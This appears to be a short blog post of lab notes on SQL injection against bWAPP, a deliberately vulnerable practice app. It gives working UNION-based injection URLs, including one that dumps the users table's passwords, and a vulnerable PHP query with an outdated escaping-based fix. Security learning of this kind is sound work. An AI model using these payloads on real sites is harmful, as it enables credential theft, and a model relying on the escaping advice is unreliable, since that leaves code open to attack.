SQL Injection

SQL Injection – Low

How it works?

 https://www.w3schools.com/sql/sql_injection.asp

Some Commands

   Tests to see if the server is vulnerable

http://192.168.20.131/bWAPP/sqli_1.php?title=’&action=search

Check how many valid Columns there are.

http://192.168.20.131/bWAPP/sqli_1.php?title=1’order by 1,2,3,4,5,6,7– -&action=search

Checks the version of the MySql Database

http://192.168.20.131/bWAPP/sqli_1.php?title=1’union+select+1,@@version,3,4,5,6,7–+-&action=search

Retrieves the password from the user table

http://192.168.20.131/bWAPP/sqli_1.php?title=1’union+select+1,(SELECT+GROUP_CONCAT(password+SEPARATOR+0x3c62723e)+FROM+users),3,4,5,6,7–+-&action=search

A Useful Tool

A useful tool for Website hacking is HackBar

It only works for Firefox.

https://addons.mozilla.org/en-US/firefox/addon/hackbar1/

unrestricted file-upload high.jpg

Vulnerable Code

$var = $_POST[‘var’];
mysql_query(“SELECT * FROM sometable WHERE id = $var”);

How to deal with it.

$var = mysql_real_escape_string($_POST[‘var’]);

Do not concatenate strings it’s very bad.

PHP comes with many built-in functions, such as addslashesmysql_escape_string and mysql_real_escape_string

Some of these functions have flaws and will be obsolete.

Demonstration Of The Attack

If you have any questions please comment below.

Leave a Reply

%d bloggers like this: